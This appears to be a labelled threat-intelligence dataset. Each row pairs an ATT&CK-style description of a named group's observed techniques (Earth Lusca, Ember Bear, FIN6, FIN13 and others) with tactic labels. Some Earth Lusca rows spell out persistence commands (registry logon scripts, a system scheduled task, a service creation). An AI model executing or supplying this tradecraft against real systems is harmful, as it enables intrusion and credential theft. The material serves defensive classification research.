"EXOTIC LILY has registered domains to spoof targeted organizations by changing the top-level domain to “.us”, “.co” or “.biz”.",['TA0042:Resource Development']
EXOTIC LILY has created e-mail accounts to spoof targeted organizations.,['TA0042:Resource Development']
EXOTIC LILY has gathered targeted individuals' e-mail addresses through open source research and website contact forms.,['TA0043:Reconnaissance']
EXOTIC LILY has used malicious documents containing exploits for CVE-2021-40444 affecting Microsoft MSHTML.,['TA0002:Execution']
"EXOTIC LILY has gained execution through victims clicking on malicious LNK files contained within ISO files, which can execute hidden DLLs within the ISO.",['TA0002:Execution']
EXOTIC LILY has used malicious links to lure users into executing malicious payloads.,['TA0002:Execution']
EXOTIC LILY has searched for information on targeted individuals on business databases including RocketReach and CrunchBase.,['TA0043:Reconnaissance']
EXOTIC LILY has used contact forms on victim websites to generate phishing e-mails.,['TA0043:Reconnaissance']
EXOTIC LILY has copied data from social media sites to impersonate targeted individuals.,['TA0043:Reconnaissance']
EXOTIC LILY has established social media profiles to mimic employees of targeted companies.,['TA0042:Resource Development']
EXOTIC LILY conducted an e-mail thread-hijacking campaign with malicious ISO attachments.,['TA0001:Initial Access']
EXOTIC LILY has relied on victims to open malicious links in e-mails for execution.,['TA0001:Initial Access']
EXOTIC LILY has used the e-mail notification features of legitimate file sharing services for spearphishing.,['TA0001:Initial Access']
"EXOTIC LILY has uploaded malicious payloads to file-sharing services including TransferNow, TransferXL, WeTransfer, and OneDrive.",['TA0042:Resource Development']
"EXOTIC LILY has used file-sharing services including WeTransfer, TransferNow, and OneDrive to deliver payloads.",['TA0011:Command and Control']
Earth Lusca has used WinRAR to compress stolen files into an archive prior to exfiltration.,['TA0009:Collection']
Earth Lusca has used the Fodhelper UAC bypass technique to gain elevated privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Earth Lusca has used a DCSync command with Mimikatz to retrieve credentials from an exploited controller.,['TA0006:Credential Access']
Earth Lusca has placed a malicious payload in `%WINDIR%\SYSTEM32\oci.dll` so it would be sideloaded by the MSDTC service.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Earth Lusca has used certutil to decode a string into a cabinet file.,['TA0005:Defense Evasion']
Earth Lusca has used Nltest to obtain information about domain controllers.,['TA0007:Discovery']
"Earth Lusca has registered domains, intended to look like legitimate target domains, that have been used in watering hole attacks.",['TA0042:Resource Development']
Earth Lusca has performed watering hole attacks.,['TA0001:Initial Access']
Earth Lusca has used the megacmd tool to upload stolen files from a victim network to MEGA.,['TA0010:Exfiltration']
"Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish.",['TA0001:Initial Access']
Earth Lusca has used Mimikatz to exploit a domain controller via the ZeroLogon exploit .,['TA0008:Lateral Movement']
Earth Lusca has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.,['TA0002:Execution']
Earth Lusca has used ProcDump to obtain the hashes of credentials by dumping the memory of the LSASS process.,['TA0006:Credential Access']
Earth Lusca required users to click on a malicious file for the loader to activate.,['TA0002:Execution']
Earth Lusca has sent spearphishing emails that required the user to click on a malicious link and subsequently open a decoy document with a malicious loader.,['TA0002:Execution']
"Earth Lusca has acquired and used a variety of malware, including Cobalt Strike.",['TA0042:Resource Development']
"Earth Lusca used the command `move file path c:\windows\system32\spool\prtprocs\x64\spool.dll` to move and register a malicious DLL name as a Windows print processor, which eventually was loaded by the Print Spooler service.",['TA0005:Defense Evasion']
Earth Lusca modified the registry using the command reg add “HKEY_CURRENT_USER\Environment” /v UserInitMprLogonScript /t REG_SZ /d “file path” for persistence.,['TA0005:Defense Evasion']
Earth Lusca has used `mshta.exe` to load an HTA script within a malicious .LNK file.,['TA0005:Defense Evasion']
Earth Lusca used Base64 to encode strings.,['TA0005:Defense Evasion']
Earth Lusca has used PowerShell to execute commands.,['TA0002:Execution']
Earth Lusca has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Earth Lusca has used Tasklist to obtain information from a compromised host.,['TA0007:Discovery']
Earth Lusca adopted Cloudflare as a proxy for compromised servers.,['TA0011:Command and Control']
Earth Lusca used Python scripts for port scanning or building reverse shells.,['TA0002:Execution']
Earth Lusca used the command powershell “Get-EventLog -LogName security -Newest 500 | where {$_.EventID -eq 4624} | format-list - property * | findstr “Address”” to find the network information of successfully logged-in accounts to discovery addresses of other machines. Earth Lusca has also used multiple scanning tools to discover other machines within the same compromised network.,['TA0007:Discovery']
Earth Lusca has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Earth Lusca used the command schtasks /Create /SC ONLOgon /TN WindowsUpdateCheck /TR “file path” /ru system for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Earth Lusca has acquired multiple servers for some of their operations, using each server for a different role.",['TA0042:Resource Development']
Earth Lusca has used compromised web servers as part of their operational infrastructure.,['TA0042:Resource Development']
Earth Lusca has sent spearphishing emails to potential targets that contained a malicious link.,['TA0001:Initial Access']
Earth Lusca has used steganography to hide shellcode in a BMP image file.,['TA0005:Defense Evasion']
Earth Lusca used the command ipconfig to obtain information about network configurations.,['TA0007:Discovery']
Earth Lusca employed a PowerShell script called RDPConnectionParser to read and filter the Windows event log “Microsoft-Windows-TerminalServices-RDPClient/Operational” to obtain network information from RDP connections. Earth Lusca has also used netstat from a compromised system to obtain network connection information.,['TA0007:Discovery']
Earth Lusca collected information on user accounts via the whoami command.,['TA0007:Discovery']
Earth Lusca has used Tasklist to obtain information from a compromised host.,['TA0007:Discovery']
Earth Lusca has acquired and used a variety of open source tools.,['TA0042:Resource Development']
"Earth Lusca has staged malware and malicious files on compromised web servers, GitHub, and Google Drive.",['TA0042:Resource Development']
Earth Lusca used VBA scripts.,['TA0002:Execution']
Earth Lusca has scanned for vulnerabilities in the public-facing servers of their targets.,['TA0043:Reconnaissance']
Earth Lusca has established GitHub accounts to host their malware.,['TA0042:Resource Development']
Earth Lusca has compromised Google Drive repositories.,['TA0042:Resource Development']
Earth Lusca used a VBA script to execute WMI.,['TA0002:Execution']
Earth Lusca created a service using the command sc create “SysUpdate” binpath= “cmd /c start “file path””&&sc config “SysUpdate” start= auto&&net start SysUpdate for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Elderwood has delivered zero-day exploits and malware to victims by injecting malicious code into specific public Web pages visited by targets within a particular sector.,['TA0001:Initial Access']
Elderwood has encrypted documents and malicious executables.,['TA0005:Defense Evasion']
"Elderwood has used exploitation of endpoint software, including Microsoft Internet Explorer Adobe Flash vulnerabilities, to gain execution. They have also used zero-day exploits.",['TA0002:Execution']
The Ritsol backdoor trojan used by Elderwood can download files onto a compromised host from a remote location.,['TA0011:Command and Control']
Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open attachments.,['TA0002:Execution']
Elderwood has leveraged multiple types of spearphishing in order to attempt to get a user to open links.,['TA0002:Execution']
Elderwood has packed malware payloads before delivery to victims.,['TA0005:Defense Evasion']
Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing malicious attachments.,['TA0001:Initial Access']
Elderwood has delivered zero-day exploits and malware to victims via targeted emails containing a link to malicious content hosted on an uncommon Web server.,['TA0001:Initial Access']
"Ember Bear uses services such as IVPN, SurfShark, and Tor to add anonymization to operations.",['TA0042:Resource Development']
Ember Bear has compressed collected data prior to exfiltration.,['TA0009:Collection']
Ember Bear engages in mass collection from compromised systems during intrusions.,['TA0009:Collection']
Ember Bear used the `su-bruteforce` tool to brute force specific users using the `su` command.,['TA0006:Credential Access']
Ember Bear has dumped configuration settings in accessed IP cameras including plaintext credentials.,['TA0006:Credential Access']
"Ember Bear has used DNS tunnelling tools, such as dnscat/2 and Iodine, for C2 purposes.",['TA0011:Command and Control']
Ember Bear gathers victim system information such as enumerating the volume of a given device or extracting system and security event logs for analysis.,['TA0009:Collection']
Ember Bear has abused default user names and passwords in externally-accessible IP cameras for initial access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ember Bear uses the NirSoft AdvancedRun utility to disable Microsoft Defender Antivirus through stopping the WinDefend service on victim machines. Ember Bear disables Windows Defender via registry key changes.,['TA0005:Defense Evasion']
"Ember Bear conducted destructive operations against victims, including disk structure wiping, via the WhisperGate malware in Ukraine.",['TA0040:Impact']
Ember Bear attempts to collect mail from accessed systems and servers.,['TA0009:Collection']
Ember Bear has created accounts on dark web forums to obtain various tools and malware.,['TA0042:Resource Development']
Ember Bear has used tools such as Rclone to exfiltrate information from victim environments to cloud storage such as `mega.nz`.,['TA0010:Exfiltration']
"Ember Bear gains initial access to victim environments by exploiting external-facing services. Examples include exploitation of CVE-2021-26084 in Confluence servers; CVE-2022-41040, ProxyShell, and other vulnerabilities in Microsoft Exchange; and multiple vulnerabilities in open-source platforms such as content management systems.",['TA0001:Initial Access']
Ember Bear has used exploits to enable follow-on execution of frameworks such as Meterpreter.,['TA0002:Execution']
"Ember Bear has used exploits for vulnerabilities such as MS17-010, also known as `Eternal Blue`, during operations.",['TA0008:Lateral Movement']
Ember Bear has obtained exploitation scripts against publicly-disclosed vulnerabilities from public repositories.,['TA0042:Resource Development']
Ember Bear is linked to the defacement of several Ukrainian organization websites.,['TA0040:Impact']
Ember Bear have used VPNs both for initial access to victim environments and for persistence within them following compromise.,"['TA0001:Initial Access', 'TA0003:Persistence']"
Ember Bear deletes files related to lateral movement to avoid detection.,['TA0005:Defense Evasion']
Ember Bear has used frameworks such as Impacket to dump LSA secrets for credential capture.,['TA0006:Credential Access']
Ember Bear uses legitimate Sysinternals tools such as procdump to dump LSASS memory.,['TA0006:Credential Access']
Ember Bear retrieves follow-on payloads direct from adversary-owned infrastructure for deployment on compromised hosts.,['TA0008:Lateral Movement']
Ember Bear has enumerated SECURITY and SYSTEM log files during intrusions.,['TA0007:Discovery']
Ember Bear has acquired malware and related tools from dark web forums.,['TA0042:Resource Development']
Ember Bear has renamed the legitimate Sysinternals tool procdump to alternative names such as dump64.exe to evade detection.,['TA0005:Defense Evasion']
"Ember Bear has renamed tools to match legitimate utilities, such as renaming GOST tunneling instances to `java` in victim environments.",['TA0005:Defense Evasion']
Ember Bear modifies registry values for anti-forensics and defense evasion purposes.,['TA0005:Defense Evasion']
Ember Bear has configured multi-hop proxies via ProxyChains within victim environments.,['TA0011:Command and Control']
Ember Bear has used tools such as NMAP for remote system discovery and enumeration in victim environments.,['TA0007:Discovery']
Ember Bear uses socket-based tunneling utilities for command and control purposes such as NetCat and Go Simple Tunnel . These tunnels are used to push interactive command prompts over the created sockets. Ember Bear has also used reverse TCP connections from Meterpreter installations to communicate back with C2 infrastructure.,['TA0011:Command and Control']
Ember Bear has used various non-standard ports for C2 communication.,['TA0011:Command and Control']
"Ember Bear gathers credential material from target systems, such as SSH keys, to facilitate access to victim environments.",['TA0006:Credential Access']
Ember Bear has used pass-the-hash techniques for lateral movement in victim environments.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
Ember Bear has conducted password spraying against Outlook Web Access infrastructure to identify valid user names and passwords.,['TA0006:Credential Access']
"Ember Bear has used PowerShell commands to gather information from compromised systems, such as email servers.",['TA0002:Execution']
Ember Bear has used ProxyChains to tunnel protocols to internal networks.,['TA0011:Command and Control']
"Ember Bear uses valid network credentials gathered through credential harvesting to move laterally within victim networks, often employing the Impacket framework to do so.",['TA0008:Lateral Movement']
Ember Bear has used tools such as Nmap and MASSCAN for remote service discovery.,['TA0007:Discovery']
Ember Bear has targeted IP ranges for vulnerability scanning related to government and critical infrastructure organizations.,['TA0043:Reconnaissance']
Ember Bear uses remotely scheduled tasks to facilitate remote command execution on victim machines.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Ember Bear acquires victim credentials by extracting registry hives such as the Security Account Manager through commands such as reg save.,['TA0006:Credential Access']
"Ember Bear has compromised information technology providers and software developers providing services to targets of interest, building initial access to ultimate victims at least in part through compromise of service providers that work with the victim organizations.",['TA0001:Initial Access']
Ember Bear has exfiltrated images from compromised IP cameras.,['TA0009:Collection']
"Ember Bear has used virtual private servers to host tools, perform reconnaissance, exploit victim infrastructure, and as a destination for data exfiltration.",['TA0042:Resource Development']
Ember Bear has used publicly available tools such as MASSCAN and Acunetix for vulnerability scanning of public-facing infrastructure.,['TA0043:Reconnaissance']
"Ember Bear deploys web shells following initial access for either follow-on command execution or protocol tunneling. Example web shells used by Ember Bear include P0wnyshell, reGeorg, P.A.S. Webshell, and custom variants of publicly-available web shell examples.",['TA0003:Persistence']
Ember Bear has used WMI execution with password hashes for command execution and lateral movement.,['TA0002:Execution']
Equation is known to have the capability to overwrite the firmware on hard drives from some manufacturers.,"['TA0005:Defense Evasion', 'TA0003:Persistence']"
Equation has been observed utilizing environmental keying in payload delivery.,['TA0005:Defense Evasion']
Equation has used an encrypted virtual file system stored in the Windows Registry.,['TA0005:Defense Evasion']
Equation has used tools with the functionality to search for specific information about the attached hard drive that could be used to identify and overwrite the firmware.,['TA0007:Discovery']
Evilnum has used PowerShell to bypass UAC.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Evilnum can collect email credentials from victims.,['TA0006:Credential Access']
"Evilnum has used the malware variant, TerraTV, to load a malicious DLL placed in the TeamViewer directory, instead of the original Windows DLL located in a system folder.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Evilnum has deleted files used during infection.,['TA0005:Defense Evasion']
Evilnum can deploy additional components or tools as needed.,['TA0011:Command and Control']
Evilnum has used malicious JavaScript files on the victim's machine.,['TA0002:Execution']
Evilnum has sent spearphishing emails designed to trick the recipient into opening malicious shortcut links which downloads a .LNK file.,['TA0002:Execution']
"EVILNUM has used the malware variant, TerraTV, to run a legitimate TeamViewer application to connect to compromrised machines.",['TA0011:Command and Control']
Evilnum has sent spearphishing emails containing a link to a zip file hosted on Google Drive.,['TA0001:Initial Access']
Evilnum can steal cookies and session information from browsers.,['TA0006:Credential Access']
Evilnum has used a component called TerraLoader to check certain hardware and file information to detect sandboxed environments.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
FIN10 has used batch scripts and scheduled tasks to delete critical system files.,['TA0005:Defense Evasion']
FIN10 has deployed Meterpreter stagers and SplinterRAT instances in the victim network after moving laterally.,['TA0008:Lateral Movement']
FIN10 has moved laterally using the Local Administrator account.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN10 uses PowerShell for execution as well as PowerShell Empire to establish persistence.,['TA0002:Execution']
FIN10 has established persistence by using the Registry option in PowerShell Empire to add a Run key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN10 has used RDP to move laterally to systems in the victim environment.,['TA0008:Lateral Movement']
FIN10 has established persistence by using S4U tasks as well as the Scheduled Task option in PowerShell Empire.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN10 has used Meterpreter to enumerate users on remote systems.,['TA0007:Discovery']
FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.,['TA0042:Resource Development']
FIN10 has used stolen credentials to connect remotely to victim networks using VPNs protected with only a single factor.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN10 has executed malicious .bat files containing PowerShell commands.,['TA0002:Execution']
FIN13 has enumerated all users and their roles from a victim's main treasury system.,['TA0007:Discovery']
FIN13 has assigned newly created accounts the sysadmin role to maintain persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN13 has compressed the dump output of compromised credentials with a 7zip binary.,['TA0009:Collection']
FIN13 has obtained administrative credentials by browsing through local files on a compromised machine.,['TA0006:Credential Access']
FIN13 has used IISCrack.dll as a side-loading technique to load a malicious version of httpodbc.dll on old IIS Servers .,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN13 has injected fraudulent transactions into compromised networks that mimic legitimate behavior to siphon off incremental amounts of money.,['TA0040:Impact']
"FIN13 has gathered stolen credentials, sensitive data such as point-of-sale , and ATM data from a compromised network before exfiltration.",['TA0009:Collection']
FIN13 has leveraged default credentials for authenticating myWebMethods and QLogic web management interface to gain initial access.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN13 has utilized `certutil` to decode base64 encoded versions of custom malware.,['TA0005:Defense Evasion']
FIN13 can identify user accounts associated with a Service Principal Name and query Service Principal Names within the domain by utilizing the following scripts: `GetUserSPNs.vbs` and `querySpn.vbs`.,['TA0007:Discovery']
"FIN13 has exploited known vulnerabilities such as CVE-2017-1000486 , CVE-2015-7450 , CVE-2010-5326 , and EDB-ID-24963 to gain initial access.",['TA0001:Initial Access']
FIN13 has gained access to compromised environments via remote access services such as the corporate virtual private network .,"['TA0001:Initial Access', 'TA0003:Persistence']"
FIN13 has used the Windows `dir` command to enumerate files and directories in a victim's network.,['TA0007:Discovery']
"FIN13 has observed the victim's software and infrastructure over several months to understand the technical process of legitimate financial transactions, prior to attempting to conduct fraudulent transactions.",['TA0040:Impact']
FIN13 has researched employees to target for social engineering attacks.,['TA0043:Reconnaissance']
FIN13 has created hidden files and folders within a compromised Linux system `/tmp` directory. FIN13 also has used `attrib.exe` to hide gathered local host information.,['TA0005:Defense Evasion']
FIN13 has downloaded additional tools and malware to compromised systems.,['TA0011:Command and Control']
FIN13 has utilized a proxy tool to communicate between compromised assets.,['TA0011:Command and Control']
FIN13 has used `Ping` and `tracert` for network reconnaissance efforts.,['TA0007:Discovery']
FIN13 has logged the keystrokes of victims to escalate privileges.,"['TA0009:Collection', 'TA0006:Credential Access']"
FIN13 has obtained memory dumps with ProcDump to parse and extract credentials from a victim's LSASS process memory with Mimikatz.,['TA0006:Credential Access']
FIN13 has created MS-SQL local accounts in a compromised network.,['TA0003:Persistence']
FIN13 has utilized the following temporary folders on compromised Windows and Linux systems for their operations prior to exfiltration: `C:\Windows\Temp` and `/tmp`.,['TA0009:Collection']
FIN13 has utilized tools such as Incognito V2 for token manipulation and impersonation.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
FIN13 has utilized custom malware to maintain persistence in a compromised environment.,['TA0042:Resource Development']
FIN13 has used scheduled tasks names such as `acrotyr` and `AppServicesr` to mimic the same names in a compromised network's `C:\Windows` directory.,['TA0005:Defense Evasion']
FIN13 has masqueraded staged data by using the Windows certutil utility to generate fake Base64 encoded certificates with the input file.,['TA0005:Defense Evasion']
"FIN13 has masqueraded WAR files to look like legitimate packages such as, wsexample.war, wsexamples.com, examples.war, and exampl3s.war.",['TA0005:Defense Evasion']
FIN13 has replaced legitimate KeePass binaries with trojanized versions to collect passwords from numerous applications.,"['TA0006:Credential Access', 'TA0005:Defense Evasion', 'TA0003:Persistence']"
FIN13 has harvested the NTDS.DIT file and leveraged the Impacket tool on the compromised domain controller to locally decrypt it.,['TA0006:Credential Access']
FIN13 has utilized `nmap` for reconnaissance efforts. FIN13 has also scanned for internal MS-SQL servers in a compromised network.,['TA0007:Discovery']
FIN13 has executed net view commands for enumeration of open shares on compromised machines.,['TA0007:Discovery']
FIN13 has searched for infrastructure that can provide remote access to an environment for targeting efforts.,['TA0043:Reconnaissance']
FIN13 has used the PowerShell utility `Invoke-SMBExec` to execute the pass the hash method for lateral movement within an compromised environment.,"['TA0005:Defense Evasion', 'TA0008:Lateral Movement']"
FIN13 has enumerated all users and roles from a victim's main treasury system.,['TA0007:Discovery']
FIN13 has used PowerShell commands to obtain DNS data from a compromised network.,['TA0002:Execution']
FIN13 has utilized web shells and Java tools for tunneling capabilities to and from compromised assets.,['TA0011:Command and Control']
"FIN13 has used Windows Registry run keys such as, `HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hosts` to maintain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN13 has remotely accessed compromised environments via Remote Desktop Services for lateral movement.,['TA0008:Lateral Movement']
FIN13 has leveraged SMB to move laterally within a compromised network via application servers and SQL servers.,['TA0008:Lateral Movement']
FIN13 has remotely accessed compromised environments via secure shell for lateral movement.,['TA0008:Lateral Movement']
FIN13 has created scheduled tasks in the `C:\Windows` directory of the compromised network.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN13 has extracted the SAM and SYSTEM registry hives using the `reg.exe` binary for obtaining password hashes from a compromised machine.,['TA0006:Credential Access']
"FIN13 has collected local host information by utilizing Windows commands `systeminfo`, `fsutil`, and `fsinfo`. FIN13 has also utilized a compromised Symantex Altiris console and LanDesk account to retrieve host information.",['TA0007:Discovery']
FIN13 has used `nslookup` and `ipconfig` for network reconnaissance efforts. FIN13 has also utilized a compromised Symantec Altiris console and LanDesk account to retrieve network information.,['TA0007:Discovery']
FIN13 has used `netstat` and other net commands for network reconnaissance efforts.,['TA0007:Discovery']
"FIN13 has utilized publicly available tools such as Mimikatz, Impacket, PWdump7, ProcDump, Nmap, and Incognito V2 for targeting efforts.",['TA0042:Resource Development']
FIN13 has used VBS scripts for code execution on comrpomised machines.,['TA0002:Execution']
FIN13 has used HTTP requests to chain multiple web shells and to contact actor-controlled C2 servers prior to exfiltrating stolen data.,['TA0011:Command and Control']
"FIN13 has utilized obfuscated and open-source web shells such as JspSpy, reGeorg, MiniWebCmdShell, and Vonloesch Jsp File Browser 1.2 to enable remote code execution and to execute commands on compromised web server.",['TA0003:Persistence']
FIN13 has leveraged `xp_cmdshell` and Windows Command Shell to execute commands on a compromised machine. FIN13 has also attempted to leverage the ‘xp_cmdshell’ SQL procedure to execute remote commands on internal MS-SQL servers.,['TA0002:Execution']
FIN13 has utilized `WMI` to execute commands and move laterally on compromised Windows machines.,['TA0002:Execution']
FIN13 has leveraged `WMI` to move laterally within a compromised network via application servers and SQL servers.,['TA0008:Lateral Movement']
"FIN4 has created rules in victims' Microsoft Outlook accounts to automatically delete emails containing words such as “hacked,"" ""phish,"" and “malware"" in a likely attempt to prevent organizations from communicating about their activities.",['TA0005:Defense Evasion']
FIN4 has presented victims with spoofed Windows Authentication prompts to collect their credentials.,"['TA0009:Collection', 'TA0006:Credential Access']"
FIN4 has captured credentials via fake Outlook Web App login pages and has also used a .NET based keylogger.,"['TA0009:Collection', 'TA0006:Credential Access']"
FIN4 has lured victims to launch malicious attachments delivered via spearphishing emails .,['TA0002:Execution']
FIN4 has lured victims to click malicious links delivered via spearphishing emails .,['TA0002:Execution']
FIN4 has used Tor to log in to victims' email accounts.,['TA0011:Command and Control']
FIN4 has accessed and hijacked online email communications using stolen credentials.,['TA0009:Collection']
FIN4 has used spearphishing emails containing attachments with embedded malicious macros.,['TA0001:Initial Access']
FIN4 has used spearphishing emails containing malicious links.,['TA0001:Initial Access']
FIN4 has used legitimate credentials to hijack email communications.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN4 has used VBA macros to display a dialog box and collect victim credentials.,['TA0002:Execution']
FIN4 has used HTTP POST requests to transmit data.,['TA0011:Command and Control']
FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.,['TA0009:Collection']
FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials.,['TA0006:Credential Access']
FIN5 has cleared event logs from victims.,['TA0005:Defense Evasion']
FIN5 scans processes on all victim systems in the environment and uses automated scripts to pull back the results.,['TA0002:Execution']
FIN5 maintains access to victim environments by using FLIPSIDE to create a proxy for a backup RDP tunnel.,['TA0011:Command and Control']
"FIN5 has used legitimate VPN, Citrix, or VNC credentials to maintain access to a victim environment.","['TA0001:Initial Access', 'TA0003:Persistence']"
FIN5 uses SDelete to clean up the environment and attempt to prevent detection.,['TA0005:Defense Evasion']
FIN5 scripts save memory dump data into a specific directory on hosts in the victim environment.,['TA0009:Collection']
FIN5 has used the open source tool Essential NetTools to map the network and build a list of targets.,['TA0007:Discovery']
"FIN5 has obtained and used a customized version of PsExec, as well as use other tools such as pwdump, SDelete, and Windows Credential Editor.",['TA0042:Resource Development']
"FIN5 has used legitimate VPN, RDP, Citrix, or VNC credentials to maintain access to a victim environment.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN6 has used has used Metasploit’s named-pipe impersonation technique to escalate privileges.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"Following data collection, FIN6 has compressed log files into a ZIP archive prior to staging and exfiltration.",['TA0009:Collection']
"FIN6 has encoded data gathered from the victim with a simple substitution cipher and single-byte XOR using the 0xAA key, and Base64 with character permutation.",['TA0009:Collection']
FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.,['TA0011:Command and Control']
"FIN6 has used a script to iterate through a list of compromised PoS systems, copy and remove data to a log file, and to bind to events from the submit payment button.",['TA0009:Collection']
FIN6 has used Comodo code-signing certificates.,['TA0005:Defense Evasion']
FIN6 has used encoded PowerShell commands.,['TA0005:Defense Evasion']
"FIN6 has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.",['TA0002:Execution']
FIN6 has used the Stealer One credential stealer to target e-mail and file transfer utilities including FTP.,['TA0006:Credential Access']
FIN6 has used the Stealer One credential stealer to target web browsers.,['TA0006:Credential Access']
FIN6 has collected schemas and user accounts from systems running SQL Server.,['TA0009:Collection']
FIN6 has collected and exfiltrated payment card data from compromised systems.,['TA0009:Collection']
FIN6 has deployed a utility script named kill.bat to disable anti-virus.,['TA0005:Defense Evasion']
FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.,['TA0007:Discovery']
FIN6 has sent stolen payment card data to remote servers via HTTP POSTs.,['TA0010:Exfiltration']
"FIN6 has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.",['TA0004:Privilege Escalation']
FIN6 has removed files from victim machines.,['TA0005:Defense Evasion']
FIN6 has used malicious JavaScript to steal payment card data from e-commerce sites.,['TA0002:Execution']
FIN6 has used Windows Credential Editor for credential dumping.,['TA0006:Credential Access']
FIN6 has used malicious documents to lure victims into allowing execution of PowerShell scripts.,['TA0002:Execution']
"FIN6 has renamed the ""psexec"" service name to ""mstdc"" to masquerade as a legitimate Windows service.",['TA0005:Defense Evasion']
FIN6 has used Metasploit’s PsExec NTDSGRAB module to obtain a copy of the victim's Active Directory database.,['TA0006:Credential Access']
"FIN6 used publicly available tools to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language servers, and NetBIOS.",['TA0007:Discovery']
FIN6 has used Metasploit Bind and Reverse TCP stagers.,['TA0011:Command and Control']
FIN6 has extracted password hashes from ntds.dit to crack offline.,['TA0006:Credential Access']
"FIN6 has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.",['TA0002:Execution']
FIN6 used the Plink command-line utility to create SSH tunnels to C2 servers.,['TA0011:Command and Control']
FIN6 has used Registry Run keys to establish persistence for its downloader tools known as HARDTACK and SHIPBREAD.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN6 actors have compressed data from remote systems and moved it to another staging system before exfiltration.,['TA0009:Collection']
FIN6 used RDP to move laterally in victim networks.,['TA0008:Lateral Movement']
"FIN6 used publicly available tools to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language servers, and NetBIOS.",['TA0007:Discovery']
"FIN6 has used scheduled tasks to establish persistence for various malware it uses, including downloaders known as HARDTACK and SHIPBREAD and FrameworkPOS.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN6 has created Windows services to execute encoded PowerShell commands.,['TA0002:Execution']
FIN6 has targeted victims with e-mails containing malicious attachments.,['TA0001:Initial Access']
FIN6 has used fake job advertisements sent via LinkedIn to spearphish targets.,['TA0001:Initial Access']
"FIN6 has obtained and used tools such as Mimikatz, Cobalt Strike, and AdFind.",['TA0042:Resource Development']
"To move laterally on a victim network, FIN6 has used credentials stolen from various systems on which it gathered usernames and password hashes.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
FIN6 has used Pastebin and Google Storage to host content for their operations.,['TA0011:Command and Control']
FIN6 has used kill.bat script to disable security tools.,['TA0002:Execution']
FIN6 has used WMI to automate the remote execution of PowerShell scripts.,['TA0002:Execution']
FIN7 has used application shim databases for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"FIN7 used legitimate services like Google Docs, Google Scripts, and Pastebin for C2.",['TA0011:Command and Control']
FIN7 has used random junk code to obfuscate malware code.,['TA0005:Defense Evasion']
"FIN7 has signed Carbanak payloads with legally purchased code signing certificates. FIN7 has also digitally signed their phishing documents, backdoors and other staging tools to bypass security controls.",['TA0005:Defense Evasion']
"FIN7 has used fragmented strings, environment variables, standard input , and native character-replacement functionalities to obfuscate commands.",['TA0005:Defense Evasion']
FIN7 used SQL scripts to help perform tasks on the victim's machine.,['TA0002:Execution']
FIN7 has gained initial access by compromising a victim's software supply chain.,['TA0001:Initial Access']
"FIN7 has performed C2 using DNS via A, OPT, and TXT records.",['TA0011:Command and Control']
FIN7 has encrypted virtual disk volumes on ESXi servers using a version of Darkside ransomware.,['TA0040:Impact']
FIN7 has collected files and other sensitive information from a compromised network.,['TA0009:Collection']
